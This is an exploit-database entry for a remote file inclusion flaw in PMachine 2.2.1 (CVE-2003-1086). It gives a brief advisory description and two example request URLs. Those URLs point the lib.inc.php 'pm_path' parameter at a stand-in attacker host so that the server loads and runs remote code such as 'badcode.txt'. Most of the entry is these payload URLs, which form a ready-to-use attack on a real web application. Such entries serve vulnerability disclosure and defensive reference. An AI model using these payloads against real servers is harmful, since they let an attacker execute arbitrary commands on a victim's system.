[] NeoSense

PMachine 2.2.1 - '/Lib.Inc.php' Remote File Inclusion / Command Execution

Author: frog
type: webapps
platform: php
port: 
date_added: 2003-06-15 
date_updated: 2012-11-17 
verified: 1 
codes: CVE-2003-1086;OSVDB-2156 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/7919/info

It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands.

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with:

http://attacker.example.com/config.txt

or

http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with:

http://attacker.example.com/config/badcode.txt